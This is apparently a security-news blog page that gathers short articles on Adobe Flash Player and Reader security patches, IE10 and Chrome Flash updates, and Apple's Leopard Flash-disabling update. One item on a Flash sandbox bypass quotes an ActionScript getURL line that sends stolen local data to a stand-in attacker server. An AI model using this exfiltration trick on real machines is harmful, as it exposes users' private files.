December 18, 2018

In brief: Microsoft updates Internet Explorer 10 to address vulnerabilities in Adobe Flash Player

(LiveHacking.Com) – Adobe has released a new version of its ubiquitous Flash Player to address vulnerabilities that could cause a crash and potentially be exploited by an attacker to infect a PC with malware. As a result Microsoft has issued a patch to IE10 to update the browser’s built-in version of Flash Player.

Microsoft has revised Security Advisory 2755801 to reflect the changes. The new version of IE is available for all supported editions of Windows 8, Windows Server 2012, and Windows RT. For more information about the update, including download links, see Microsoft Knowledge Base Article 2770041

“We remain committed to taking the appropriate actions to help protect customers and will continue to work closely with Adobe to deliver quality protections that are aligned with Adobe’s update process,” said Dave Forstrom, Director, Microsoft Trustworthy Computing.

Adobe has released a security update for Adobe Flash Player

(LiveHacking.Com) – Adobe has released a security update for Adobe Flash Player to address vulnerabilities that could cause a crash and potentially be exploited by an attacker to infect a PC with malware.

The update applies to Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh, Adobe Flash Player 11.2.202.243 and earlier versions for Linux, Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x.

The update addresses six different memory issues and a security bypass vulnerability:

  • Buffer overflow vulnerabilities that could lead to code execution (CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, CVE-2012-5277, CVE-2012-5280).
  • Memory corruption vulnerabilities that could lead to code execution (CVE-2012-5279).
  • Security bypass vulnerability that could lead to code execution (CVE-2012-5278).

If you need to check the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right-click on content running in Flash Player and select “About Adobe (or Macromedia) Flash Player” from the menu. For those with multiple browsers installed you should perform the check for each browser. Android users should tap on Settings > Applications > Manage Applications > Adobe Flash Player x.x.

The built-in version of Flash Player has also been updated in Internet Explorer 10 and Chrome.

Adobe updates Flash Player to fix 25 security vulnerabilities

(LiveHacking.Com) – Adobe has released a new version of its Flash Player to address a multitude of security vulnerabilities. The new release fixes at least 25 separate security flaws. Adobe also released a security patch for its Adobe AIR software. According to Adobe, “these updates address vulnerabilities that could cause a crash and potentially allow an attacker to take control of the affected system.”

The update affects all Flash platforms including Windows, Mac, Linux and Android. Adobe has released security updates for:

  • Adobe Flash Player 11.4.402.278 and earlier versions for Windows
  • Adobe Flash Player 11.4.402.265 and earlier versions for Macintosh,
  • Adobe Flash Player 11.2.202.238 and earlier for versions for Linux,
  • Adobe Flash Player 11.1.115.17 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.16 and earlier versions for Android 3.x and 2.x.

For Adobe AIR users, all versions prior to 3.4.0.2540 on Windows, Macintosh and Android should update to Adobe AIR 3.4.0.2710.

There are two categories of vulnerabilities fix in this release: buffer overflow vulnerabilities that could lead to code execution and memory corruption vulnerabilities that could also lead to code execution.

If you are still using Flash Player 10 and you cannot update to Flash Player 11.4.402.287, Adobe has released Flash Player 10.3.183.29, which can be downloaded here.

Apple Releases First OS X 10.5 Update For Nearly a Year – But Doesn’t Patch Any Known Vulnerabilities

(LiveHacking.Com) – Apple have made the interesting move of releasing a security update for OS X 10.5 Leopard which doesn’t actually patch any known vulnerabilities. Instead the update for the oldest of the OS X versions that runs on Intel Macs disables out-of-date versions of Adobe Flash Player.

Leopard Security Update 2012-003 disables Adobe Flash Player if it is older than 10.1.102.64. It does this by moving its files to a new directory. If the update disables Flash Player the user is presented with the option to install an updated version of from the Adobe website. Apple disabled Flash Player older than 10.1.102.64 on OS X Snow Leopard and OS X Lion a few days ago.

Apple have also released a version of the Flashback malware removal tool designed for Leopard. Apple released the same tool for Snow Leopard and Lion almost a month ago. According to the advisory: “This update runs a malware removal tool that will remove the most common variants of the Flashback malware. If the Flashback malware is found, it presents a dialog notifying the user that malware was removed. There is no indication to the user if malware is not found.”

Leopard has been left languishing without any updates from Apple for nearly a year. The last application update was for iTunes in November 2011, while the last operating system level update was in June of the same year.

There are of course still users of OS X 10.4 and OS X 10.5 for the PowerPC which it seems Apple has completely abandoned.

Bypass Flash Player Sandbox

Adobe Flash applications run locally can access to the local files and transfer them to the attacker server.

Adobe has implemented a number of sandboxes to enhance the user’s security. However, the imposed restrictions by sandboxes are depending to the origin and access rights of the SWF file. Hence, the local SWF files run within the local-with-file-system sandbox and are permitted to access to the local files without an access to the network.

However, the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. Therefore, it is possible to send files to a server using the file: protocol handler. Nevertheless, this is only possible within the local area network.

Billy Rios has identified other protocol handler which can be used to send data to remote servers by mhtml and using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”); from the victim PC.

Chrome to run Flash Player in a sandbox

The latest developer version (dev channel) of the Chrome browser for Windows is equipped with a sandbox for running Adobe’s Flash plug-in. If an attacker succeeds in exploiting a security vulnerability in the plug-in, the sandbox should cushion the worst of the blow by blocking access to critical system files. Abobe Flash Player is a godsend for attackers, because almost everyone has it installed on their system and new vulnerabilities in Flash are constantly being discovered.

Read the full story here.

Source:[TheHSecurity]

Unscheduled Security Update for Adobe Reader and Acrobat

The unscheduled security update for Adobe Reader and Acrobat to fixes more than 18 security holes. Here is the release note from Adobe Security Bulletin:

Critical vulnerabilities have been identified in Adobe Reader 9.4 (and earlier versions) for Windows, Macintosh and UNIX, and Adobe Acrobat 9.4 (and earlier 9.x versions) for Windows and Macintosh. These vulnerabilities could cause the application to crash and potentially allow an attacker to take control of the affected system.

In addition to addressing CVE-2010-3654 noted in Security Advisory APSA10-05 and CVE-2010-4091 referenced in the Adobe PSIRT blog (“Potential issue in Adobe Reader“), these updates also incorporate the Adobe Flash Player update as noted in Security Bulletin APSB10-26.

[ad code=6 align=left]

Adobe recommends users of Adobe Reader 9.4 and earlier versions for Windows and Macintosh update to Adobe Reader 9.4.1, available now. Adobe recommends users of Adobe Reader 9.4 and earlier versions for UNIX update to Adobe Reader 9.4.1, expected to be available on November 30, 2010. Adobe recommends users of Adobe Acrobat 9.4 and earlier 9.x versions for Windows and Macintosh update to Adobe Acrobat 9.4.1.

Note that these updates represent an out-of-cycle release. The next quarterly security updates for Adobe Reader and Acrobat are scheduled for February 8, 2011.

Please visit Adobe Security Bulletins for more information about this update.

Source:[Adobe Security Bulletins]